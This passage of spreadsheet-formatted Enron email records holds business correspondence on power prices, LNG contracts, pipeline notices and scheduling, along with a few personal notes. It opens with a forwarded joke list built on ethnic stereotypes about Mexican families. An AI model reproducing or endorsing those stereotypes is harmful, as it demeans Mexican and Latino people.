X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.2615.200_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200_x000D_
_x000D_
_x000D_
FW:? A SERIOUS MEXICAN BIRTHDAY  PARTY!_x000D_
?_x000D_
You know you are at a SERIOUS MEXICAN BIRTHDAY  PARTY IF:_x000D_
?_x000D_
1.??? Some of the guests didn't  bring a gift, but brought extra uninvited _x000D_
kids._x000D_
2.??? When the cake says "Happy  Birthday Mijo" instead of the child's real _x000D_
name._x000D_
3.??? The party is at Chuck E.  Cheese, but they brought their own food, _x000D_
cake, and a pinata._x000D_
4.??? It's a party, but there are  more grown-ups than children._x000D_
5.??? It's "Mijo's" 1st Birthday and  the party food is carne asada, arroz _x000D_
con frijoles puercos, y 10 cases of  beer._x000D_
6.??? For entertainment, instead of  playing pin the tail on the donkey, _x000D_
there is usually a televised baseball,  football game, or a live fight._x000D_
7.??? They don't sing Happy  Birthday, instead everyone is salsa dancing._x000D_
8.??? The party was over at 5:00,  it's 10:00 and the party is just starting._x000D_
9.??? You find out from Abuela that  Abuelo is taking viagra._x000D_
10.??? The host calls someone who's  on their way and tells them to stop and _x000D_
get some tortillas and ice._x000D_
11.??? The guests start arriving and  the hostess disappears to get ready._x000D_
12.??? You hear someone go up to the  birthday child and say "Mira, tan cute!"_x000D_
13.??? Someone else says? "I'm  going to have to get you something next week _x000D_
when I get paid._x000D_
14.??? The party is Saturday, and  you get a call from the hostess Friday _x000D_
night saying, "I'm giving Mijo a birthday  party tomorrow at 3:00."_x000D_
15.??? Some guests bring gifts that  are still in the store bag unwrapped._x000D_
16.??? There always seems to be more  family than friends at the party._x000D_
17.??? You have the party over at  your's brother's because he bought a new _x000D_
house and he has a pool._x000D_
18.??? The cake didn't come from the  store; it came from the mother of the _x000D_
comadre of your friend's sister who makes  really good cakes._x000D_
19.??? You are told you have to save  your plate and fork you ate your food _x000D_
with, so you can eat you  cake._x000D_
20.??? Someone calls and says they  can't make it, but asks that you save _x000D_
them some cake._x000D_
21.??? Guests are wrapping up cake  to take to Madre, Tio, Abuela, Chata y el _x000D_
Junior._x000D_
22.??? The party music is coming  from a small boom box._x000D_
23.??? The birthday child is dressed  from head to toe in Tommy._x000D_
24.??? The birthday baby's Daddy  comes to the party and brings the kid he _x000D_
had before and after the Birthday  Baby._x000D_
25.??? It's "Mijo's" party, but  since his cousin Madonna is there and her _x000D_
birthday is in a few days, it becomes  Mijo's and Madonna's party._x000D_
?_x000D_
Power to la Raza_x000D_
?_x000D_
I thought this was?something to share with all  you REAL Mexicans and those _x000D_
who are still trying to get to know  us.........._x000D_
_x000D_
?_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 06:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>that is nasty</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 23:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Jeff Shankman Briefing</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
Should we make arrangements for lunch?_x000D_
What about inviting Brad Romine: he was instrumental in_x000D_
forming this relationship?_x000D_
_x000D_
Vince_x000D_
_x000D_
Shirley, please include on my calendar._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
03/06/2001 04:10 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT, Sandeep Kohli@Enron, Anshuman _x000D_
Srivastav/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Jeff Shankman Briefing_x000D_
_x000D_
We are on Jeff's calendar from 2:00-2:30 on Friday, March 9th._x000D_
_x000D_
_x000D_
Vince:   EBS meetings are currently 9-10 AM in 19c2:  discussion with Paul _x000D_
Racicot_x000D_
 and      1-2 PM   (location TBA)  Giuseppe Paleologo  presentation on IP _x000D_
trading._x000D_
_x000D_
_x000D_
--Stinson_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Jun 2000 03:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/30/2000 10:09 AM -----_x000D_
_x000D_
	Susan Bailey_x000D_
	06/30/2000 09:10 AM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: ENA Financial Trading Forms_x000D_
_x000D_
Carol, _x000D_
_x000D_
Attached is a list of the current forms used by ENA.  The list also includes _x000D_
where the form can be located._x000D_
_x000D_
Let me know if additional forms should be included._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3806A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
E:mail:  Susan.Bailey@enron.com</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 03:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karen.denne@enron.com', 'janel.guerrero@enron.com'})</t>
  </si>
  <si>
    <t>Re: SF columnist's dig at Enron</t>
  </si>
  <si>
    <t xml:space="preserve">FYI:  Morse is a very popular opinion, general interest columnist._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Janel Guerrero_x000D_
	03/30/2001 11:24 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, James D _x000D_
Steffes/NA/Enron@Enron, Mark Palmer/Corp/Enron@ENRON, Karen _x000D_
Denne/Corp/Enron@ENRON, Sandra McCubbin/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, _x000D_
Leslie Lawner/NA/Enron@Enron, Susan M Landwehr/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: SF columnist's dig at Enron_x000D_
_x000D_
_x000D_
In today's SF Chronicle, Rob Morse's column:_x000D_
_x000D_
		_x000D_
_x000D_
		_x000D_
		Pac Bell Park has reopened with a lot fewer dot-com ads on the walls. But _x000D_
what's that ad on the scoreboard? In big letters it says "Enron." It's nice _x000D_
to see the Houston power company giving a little back for all the billions _x000D_
it's been gouging us. _x000D_
		_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'lance.schuler-legal@enron.com', 'stuart.zisman@enron.com', 'sandi.braband@enron.com', 'janice.moore@enron.com', 'bob.carter@enron.com', 'jeffrey.hodge@enron.com', 'marcus.nettelton@enron.com', 'peggy.banczak@enron.com', 'anne.koehler@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'richard.sanders@enron.com', 'n@enron.com', 'janet.moore@enron.com', 'teresa.bushman@enron.com', 'barton.clark@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'lou.stoler@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'john.viverito@enron.com', 'stacy.dickson@enron.com', 'mark.greenberg@enron.com', 'dan.hyvl@enron.com', 'dan.lyons@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'wayne.gresham@enron.com', 'kay.mann@enron.com', 'harry.collins@enron.com', 'michael.robison@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'peter.vecchio@enron.com', 'robert.bruce@enron.com', 'steve.hooser@enron.com', 'lisa.mellencamp@enron.com', 'robert.george@enron.com', 'michelle.cash@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Super Saturday - Associate/Analyst Program</t>
  </si>
  <si>
    <t>Our recruiting folks need any available offices for Super Saturday on _x000D_
December 9, from 9:00 AM to Noon.  Please contact Judy Nyegaard by e-mail _x000D_
(judy.nyegaard@enron.com).  Please give your room number and your extension _x000D_
if they may use your office.  Don't worry, they give strict instructions not _x000D_
to touch or move anything in the various offices being used.  Your _x000D_
cooperation would be greatly appreciated.  Many thanks._x000D_
_x000D_
_x000D_
Janette Elbertson_x000D_
Enron North America Corp._x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 04:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>did you ask that girl out?  if not go ahead and ask her out and we will make _x000D_
plans.  we can take them for margaritas then to galant night.</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 08:31:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'d..steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>FW: SPOT price reduced from 684 to 336 a few days before Eletrobolt_x000D_
 is comissioned</t>
  </si>
  <si>
    <t>Rick, Jim_x000D_
_x000D_
For your information _x000D_
_x000D_
Eletrobolt was inaugurated yesterday. Early this week, the government reduced the spot price from R$ 684/MWh  to 336. This is not only a significant loss to Eletrobolt, but also reduces in half our Annex V financial boost. I think that the decision not to run the plant, as proposed by our folks in Sao Paulo is adequate as a bargaining tool. I offered support to build stronger arguments why it does not make sense to reduce the price to 336. Government is using an argument that the market clearing price in the secondary market for quotas has been much lower thatn 684. In my view, the secondary market for quotas is a biased sample, which reflects the lowest willingness to pay in the demand curve. (the most elastic part of it). Therefore, it should not be used as a proxy for the average cost of rationing._x000D_
_x000D_
Sergio will be able to provide more details._x000D_
_x000D_
LM_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maurer, Luiz  _x000D_
Sent:	Wednesday, September 26, 2001 10:24 AM_x000D_
To:	Assad, Sergio; Sampaio, Fred; Klinger, Debora; Bestard, Jose_x000D_
Cc:	Albuquerque, Joao Carlos; Wiggs, Brett; Otavio, Luiz; Otavio, Luiz; Baccaro, Luiz_x000D_
Subject:	SPOT price reduced from 684 to 336_x000D_
_x000D_
S'ergio_x000D_
_x000D_
Para um observador externo, a decisao do governo em alterar o preco do spot na vespera da inauguracao da Eletrobolt nao soa uma atitude muito seria e que inspire confianca no investidor. Afinal, o governo ja havia decidido pelos 684 ate o fim do racionamento (como bem diz o Fred, a termica racionamento continua ligada). A gente sabia que cedo ou tarde a tentacao do cap voltaria a baila._x000D_
_x000D_
 Acho que a decisao da Enron noticiada na imprensa de interromper a producao como forma de pressao e adequada. O unico risco e que se chover muito a janela de oportunidade vai ficando mais estreita e o nosso poder de barganha se dissipa no tempo._x000D_
_x000D_
Curiso, mas esperado, ver a serie de rea'coes na imprensa citando a Enron como especuladora (Cascaes) e o absurdo que e o pre'co 684, haja vista o preco ex-post praticado nos leiloes. Para contrapor este ultimo argumento, a meu ver falacioso, e preciso ter em mente que o preco dos leiloes refleta unicamente a disposicao em pagar de uma amostra muito pequena dos consumidores, basicamente os eletro intensivos. A disposicao em pagar, cf estudo recente  da PSR varia de 200 a 13,00 /MWh; os precos dos leiloes refletem apenas o primeiro quartil. Nao da pois para afirmar com base nos precos dos leiloes que o 684 esta errado. O que sim esta errado e termos um valor unico para custo do deficit, quando ele deveria ser patamarizado. Mesmo assim, como o racionamento e linear para todas as classes, faz sentido usar um custo do deficit medio, que obviamente e e sempre sera diferente do pre'co pago nos leiloes por um grupo de consumidores com as menores disposicoes em pagar possivels._x000D_
_x000D_
Em se mantendo o 336, ter-se-ia necessariamente que revisar a penalidade dos consumidores residenciais (nas quais o fator de 3:1 guarda rela'cao com preco 684 bem como o bonus, que implica em um custo de deficit de 1000). Divorciar estas coisas (o mercado de atacado do de varejo) era a essencia da proposta do Mauro Arce em maio de 2001, a qual eu qualifiquei de o pior dos tres mundos, e gerou todo o rebu que voces sabem (anexo). ??  ??Avise se posso ajudar em elaborar melhor estes argumentos??LM</t>
  </si>
  <si>
    <t>Sat, 17 Nov 2001 08:30:43 -0800 (PST)</t>
  </si>
  <si>
    <t>Sunday</t>
  </si>
  <si>
    <t>Hi Sally,_x000D_
 _x000D_
FYI, I'm going to have a window of about 1 'till 4 on Sunday afternoon that I can make it into the office. I'll have my cell with me at all times._x000D_
 _x000D_
Regards_x000D_
MRP</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 07:27:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sanjeev.gupta@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'carol.chew@enron.com', 'c..gossett@enron.com', 'brian.gillis@enron.com', 'burton.mcintyre@enron.com', 'c..giron@enron.com', 'david.baumbach@enron.com', 'nancy.hernandez@enron.com', 'victor.guggenheim@enron.com', 'frank.prejean@enron.com', 'kathy.reeves@enron.com', 'martha.stevens@enron.com', 'john.swinney@enron.com', 'shari.mao@enron.com', 'carlos.torres@enron.com', 'cheryl.dawes@enron.com', 'shifali.sharma@enron.com', 'gladys.tan@enron.com', 'a..brown@enron.com', 'jennifer.denny@enron.com', 'mark.fondren@enron.com', 'eric.groves@enron.com', 'errol.mclaughlin@enron.com', 'torrey.moorer@enron.com', 'kenny.nicoll@enron.com', 'kam.keiser@enron.com', 'richard.cross@enron.com', 't..brogan@enron.com', 'j..hanson@enron.com', 'patryk.wlodarski@enron.com', 'bob.bowen@enron.com', 'dimitri.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Changes in TAGG Deal Capture Screen</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning everyone,_x000D_
_x000D_
There is a new version of TAGG Deal Capture Application is available for you to test under TAGG STAGE with the following modifications_x000D_
	1. Options/Swaptions  Expire date must be determined by nymex reference pub code.  In the earlier version, the expire date changes _x000D_
		Requested by : ERROL MCLAUGHLIN  (713) 345-8274 _x000D_
_x000D_
Please call me or Tagg On-Call if you encounter any problems._x000D_
_x000D_
Thanks_x000D_
Sanjeev_x000D_
x5-3816_x000D_
_x000D_
		</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Peabody Coal Sales</t>
  </si>
  <si>
    <t xml:space="preserve">FYI:  Peabody Coal Sales is not online, but Peabody COALTRADE, Inc. is._x000D_
_x000D_
_x000D_
From: Tana Jones on 02/22/2001 09:41 AM_x000D_
To: Tom Moran/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron, Tanya _x000D_
Rohauer/HOU/ECT@ECT_x000D_
cc: Wayne Gresham/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, Stephanie _x000D_
Sever/HOU/ECT@ECT _x000D_
Subject: Peabody Coal Sales_x000D_
_x000D_
Per Wayne Gresham, a lawyer in the coal group, we are having a substantial _x000D_
payment dispute with the referenced counterparty, and George McClellan, the _x000D_
business person (and a Managing Director), would like to shut them down _x000D_
immediately for all trading (which appears to be coal and emissions), offline _x000D_
and online, until this payment dispute is resolved.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Sep 1999 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'leo.nichols@enron.com'})</t>
  </si>
  <si>
    <t>Weekly Activity Report, Roswell Area</t>
  </si>
  <si>
    <t xml:space="preserve">NNG Gomez Plant, Site Cleanup has been completed.  All activities associated _x000D_
with the items identified during the sale of the facility have been _x000D_
corrected.  _x000D_
Becuse ET&amp;S  owns and WGR operates, there is a concern that WGR may not _x000D_
adhear to compliance and housekeeping  at the facility.  This has been the _x000D_
case in the past.  Discussions will be held with Enron Legal to address these _x000D_
concerns._x000D_
_x000D_
 TW Bell Lake Gas Plant, Ground Water Remediation.  A revised Water _x000D_
Development Easement from the State Land Office was received. This will allow _x000D_
TW access to install one additional downgradient groundwater monitor well.  _x000D_
The tentative schedule to install the well will be the week of September 13th._x000D_
 _x000D_
A construction permit application for installation of an SVE remediation _x000D_
system for the North Crawar C/S was mailed to the TNRCC._x000D_
_x000D_
The State of New Mexico conducted an air quality inspection of the Atoka No. _x000D_
2 C/S.  No items or deficiencies were identified by the agency._x000D_
_x000D_
The Title V air permit application for the Atoka No. 3 C/S was mailed to the _x000D_
State of New Mexico, Air Qualtiy Bureau._x000D_
_x000D_
The Notice of Intent air permit application for the Crawford C/S was mailed _x000D_
to the State of New Mexico, Air Quality Bureau._x000D_
_x000D_
Annual blanket request letters were submitted to the USFWS in New Mexico and _x000D_
Texas for renewal._x000D_
_x000D_
A meeting was held in Houston with John Woodyard of Roy F. Weston and ET&amp;S _x000D_
mgt. addressing PCB activity in natural gas pipelines as related to the _x000D_
PG&amp;E PCB Topock Lateral issue.  _x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sun, 25 Nov 2001 13:43:31 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised Section 3.4B</t>
  </si>
  <si>
    <t>Michelle, here is a suggested revision to Section 3.4 B which I believe will accomplish the objective we discussed.  We need to draft procedures to be adopted by the Committee. _x000D_
B.  If a terminated employee who is entitled to receive a severance benefit under the Plan receives a notification of layoff from Enron in compliance with the Federal Worker Adjustment and Retraining Notification Act, is placed on a period of paid leave of absence or furlough before termination of employment by Enron, and continues on the payroll of Enron for such period, the severance benefit payable under the Plan shall be reduced and offset, in a manner prescribed in procedures established by the Committee, by the amount of pay received by such employee during such period.  _x000D_
Pat</t>
  </si>
  <si>
    <t>Sat, 10 Mar 2001 02:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>Re: COLUMBIA PIPELINES CUSTOMER MEETING</t>
  </si>
  <si>
    <t xml:space="preserve">I think both of you should go. _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Scott Goodell @ ENRON                           03/08/2001 10:14 AM_x000D_
	_x000D_
_x000D_
To: Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: COLUMBIA PIPELINES CUSTOMER MEETING_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Scott Goodell/Corp/Enron on 03/08/2001 _x000D_
09:23 AM ---------------------------_x000D_
_x000D_
_x000D_
navigator@nisource.com on 03/08/2001 04:39:57 AM_x000D_
Please respond to &lt;navigator@nisource.com&gt;_x000D_
To: navigator@ceg.com_x000D_
cc:  _x000D_
_x000D_
Subject: COLUMBIA PIPELINES CUSTOMER MEETING_x000D_
_x000D_
_x000D_
_x000D_
                      COLUMBIA GAS TRANSMISSION CORPORATION_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                 MARCH 08, 2001_x000D_
_x000D_
Notice ID: 2551_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
_x000D_
SUBJECT:  COLUMBIA PIPELINES CUSTOMER MEETING_x000D_
_x000D_
Columbia Gas Transmission, Columbia Gulf Transmission, and Crossroads Pipeline_x000D_
are pleased to announce the 2001 Spring Customer Meeting scheduled for May _x000D_
14-15_x000D_
in Houston, TX._x000D_
_x000D_
Tentative plans are as follows: golf tournament to be held on Monday, May 14_x000D_
with alternative activities including a tour to the Ocean Star Offshore _x000D_
Drilling_x000D_
Rig &amp; Museum, tennis, or sporting clays, followed by a reception and dinner.  _x000D_
On_x000D_
May 15, the business program will be held at the Doubletree Hotel at Post Oak_x000D_
with the general session scheduled to begin at 9 AM followed by breakout_x000D_
sessions._x000D_
_x000D_
When arrangements are final, an agenda will be posted on NAVIGATOR, and a_x000D_
website will be available for registering electronically.  Information will be_x000D_
mailed the week of March 26.  All interested participants in Monday's program_x000D_
must pre-register for specific events as space is limited._x000D_
_x000D_
You may make your hotel reservations by calling the Doubletree at Post Oak at_x000D_
713-961-9300.  Please inform them you are attending the Columbia Pipelines_x000D_
meeting.  The group rate for this meeting is $135.00 for single and double_x000D_
occupancy.  Reservations requested after April 22 are subject to availability_x000D_
and may not be available at the reduced convention rate._x000D_
_x000D_
Attire for the meeting is business casual._x000D_
_x000D_
We look forward to seeing you in Houston and returning to Pittsburgh for the_x000D_
Fall Columbia Pipelines Meeting, October 11-12, 2001, at the William Penn_x000D_
Hotel._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 17:21:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Real Time Folks Who Haven't Attended Energy Math</t>
  </si>
  <si>
    <t>Bert,_x000D_
I would like some of these folks to attend the Energy Math class on the 8th of November. Please schedule 4 or 5 of them to go if possible._x000D_
Thanks,_x000D_
Bill_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fitzpatrick, Amy  _x000D_
Sent:	Friday, September 21, 2001 2:18 PM_x000D_
To:	Williams III, Bill_x000D_
Subject:	Real Time Folks Who Haven't Attended Energy Math_x000D_
_x000D_
Bill -_x000D_
_x000D_
We will be scheduling our next training on Thursday, 11/8._x000D_
_x000D_
Here are the Real Timers that have not attended._x000D_
_x000D_
Casey Anderson_x000D_
Craig Dean_x000D_
Leaf Harasin_x000D_
Eric Linder_x000D_
Steve Merriss_x000D_
Darin Presto_x000D_
_x000D_
Thanks!_x000D_
Amy</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>thanks, they do a great job and are an under-appreciated asset at enron. rick</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 03:14:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steven.january@enron.com', 'lynn.blair@enron.com', 'shelley.corman@enron.com', 'john.buchanan@enron.com', 'sheila.nacey@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
-----Original Message----- _x000D_
From: Kowalke, Terry _x000D_
Sent: Mon 10/22/2001 5:10 AM _x000D_
To: Kowalke, Terry _x000D_
Cc: _x000D_
Subject: _x000D_
_x000D_
_x000D_
Scheduling issues or concerns from weekend:_x000D_
 _x000D_
Saturday - All three pipes experienced report problems due to a replication error. Was resolved for the shippers and operators. The IT person is looking into this issue futher for additional fixes._x000D_
 _x000D_
Sunday - All three pipes, "Web site" went down for 40 minutes prior to the Intraday 1 deadline of 10 am. On call Reps. assisted customers by entering noms and confirming for a couple shippers and operators and extended the deadline by 25 minutes. IT person had to reboot the (X-12 Server) to resolve this issue._x000D_
 _x000D_
Florida pipe also had a "Overage Alert Day of 5%" called for Sunday._x000D_
 _x000D_
See Attachment for TW's, Socal and West of Thoreau Information:_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 17:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tomskilljr@enron.com'})</t>
  </si>
  <si>
    <t>Hi MARK!_x000D_
       The pictures arrived today.  Your letter was dated April 6 so it took_x000D_
ten days._x000D_
       Tell Sukran Mother and I think she is beautiful.  We sure enjoyed_x000D_
seeing them all.  I made copies for Sue and Tom and will mail them this_x000D_
afternoon._x000D_
      Thank you so much.  LOTS  of LOVE and KISSES to YOU and Sukran from_x000D_
MOTHER and I.     DAD</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 05:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bilal.bajwa@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'luchas.johnson@enron.com', 'susan.scott@enron.com', 'errol.mclaughlin@enron.com', 'joey.taylor@enron.com'})</t>
  </si>
  <si>
    <t>A report on Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you all might be interested in this...... It's a long long report on _x000D_
Enron!_x000D_
Bilal_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 07:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>she will say that i am so money</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 06:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen,_x000D_
_x000D_
Here are some points which require commercial et al input:_x000D_
_x000D_
Do we intend to include gas transactions in our calculation of profit?_x000D_
_x000D_
We will be buying electricity to serve their load.  How should be be paid for _x000D_
those costs?  How often?_x000D_
_x000D_
Jim Homco questioned whether we should buy the fuel oil.  What do you want to _x000D_
do?_x000D_
_x000D_
I've added the definition of Scheduling Equipment Costs.  How should it be _x000D_
used in the agreement?  Are we limiting our provision of scheduling equipment _x000D_
to the equipment  listed in the exhibit?_x000D_
_x000D_
What financial security will be required of them?_x000D_
_x000D_
Are we attaching Marketing Strategy and Trading/Risk policy, or establishing _x000D_
a time line?_x000D_
_x000D_
How do we deal with the possible cost of establishing a control area?  Are we _x000D_
absorbing it?  Will there be additional infrastructure costs?_x000D_
_x000D_
Have the exhibits been updated?  If so, could I get the latest version?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Sep 2001 18:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'royalty@vsnl.com'})</t>
  </si>
  <si>
    <t>frozenset({'tomrose@codetel.net.do'})</t>
  </si>
  <si>
    <t>Concerned most deeply about all known to me in the US.Pray all is_x000D_
 well with all of you and your families</t>
  </si>
  <si>
    <t>12th September 2001_x000D_
_x000D_
Dear Friends,_x000D_
_x000D_
I,am extremely concerned for the welfare of all my friends in the US._x000D_
_x000D_
Please email and let me find peace to learn that all of you and your families_x000D_
and friends are all OK._x000D_
_x000D_
May God be with you all at this point of time when there could be such_x000D_
great turbulances,due to such bastardly acts of human beings...what are_x000D_
such human beings all about ?_x000D_
_x000D_
Best wishes and warmest regards_x000D_
_x000D_
Please reply soonest and oblige._x000D_
_x000D_
_x000D_
Raju Kripalani</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 10:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.aronowitz@enron.com', 'daniel.rogers@enron.com'})</t>
  </si>
  <si>
    <t>LNG Contract Questions</t>
  </si>
  <si>
    <t xml:space="preserve">In reviewing the contracts, so far I have the following questions:_x000D_
_x000D_
1.     Have Oman LNG and ADgas taken the risk of non-performance by DPC and _x000D_
indirectly MSEB without any credit support?  The only security is the equity _x000D_
in DPC?  Are such contracts typically secured or done with a buyer with deep _x000D_
pockets?  How much value was put into DPC by the shareholders?_x000D_
_x000D_
2.     Are there local public policy issues that could be addressed by local _x000D_
courts with respect to the LNG contracts?  Fraud?  Bribery?  Are there any _x000D_
local law issues with respect to performance or interpretation of the _x000D_
contracts?  Isn't take-or-pay meaningless without credit support?_x000D_
_x000D_
3.     What are the arguments for DPC to terminate the contracts?  Only where _x000D_
the PPA is terminated?  Payments?_x000D_
_x000D_
4.    Who negotiated the contracts?  Were there requests for credit support?  _x000D_
From Enron?  Did Enron ever promise to indirectly "backstop" the contracts by _x000D_
its investment in Dabhol?_x000D_
_x000D_
5.   What was the discussion regarding the "reduction in operational _x000D_
capability" language in the contracts?  What was the language meant to _x000D_
cover?  Do we need our counterparty's approval to investigate other markets?_x000D_
_x000D_
6.    Is there any argument that DPC has already breached the contracts?  _x000D_
Could our counterparties issue a press release claiming damages over the _x000D_
entire term of the contract? Confidentiality and press releases?_x000D_
_x000D_
7.    What is the law on piercing the corporate veil for an Indian company _x000D_
like DPC?  Could this issue be considered separate from the contract and be _x000D_
litigated in India or Oman and thus outside the arbitration?_x000D_
_x000D_
8.     What is the list of all documents that could impact on whether or not _x000D_
Enron has any exposure under the LNG contracts?_x000D_
_x000D_
9.     Are there instances where the Dabhol project could fail and the LNG _x000D_
contracts would not novate to MSEB?  Why does it matter if the LNG contract _x000D_
obligations novate to MSEB if DPC has no money?_x000D_
_x000D_
10.   Other potential claims against Enron if the LNG contracts are _x000D_
terminated or not performed?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.ebert@broadwing.com', 'scrowell@us.oracle.com', 'mrichter@us.ibm.com', 'cgiron@mindspring.com', 'phillip.love@enron.com', 'smmayers@earthlink.net', 'kristi.giron@cfisd.net', 'kevin.bosse@enron.com', 'hollyw@email.msn.com', 'kyle.lilly@enron.com'})</t>
  </si>
  <si>
    <t>Fw: Jim Lehrer interviews Gore and Bush</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 10/25/2000 _x000D_
11:13 AM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey C Gossett_x000D_
10/25/2000 11:04 AM_x000D_
To: Dawn C Kenne/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, William _x000D_
Kelly/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fw: Jim Lehrer interviews Gore and Bush_x000D_
_x000D_
This is pretty funny._x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 10/25/2000 _x000D_
11:03 AM ---------------------------_x000D_
_x000D_
_x000D_
"Josh Fetner" &lt;jfetner@ev1.net&gt; on 10/23/2000 11:33:23 AM_x000D_
_x000D_
_x000D_
_x000D_
&gt; Jim Lehrer: Welcome to the second presidential debate_x000D_
&gt; between Vice President Al Gore and Gov. George W. Bush._x000D_
&gt; The candidates have agreed on  these rules: I will ask a question._x000D_
&gt; The candidate will ignore the question and deliver rehearsed_x000D_
&gt; remarks designed to appeal to undecided women voters._x000D_
&gt;_x000D_
&gt; The opponent will then have one minute to respond by_x000D_
&gt; trying to frighten senior citizens into voting for him. When a_x000D_
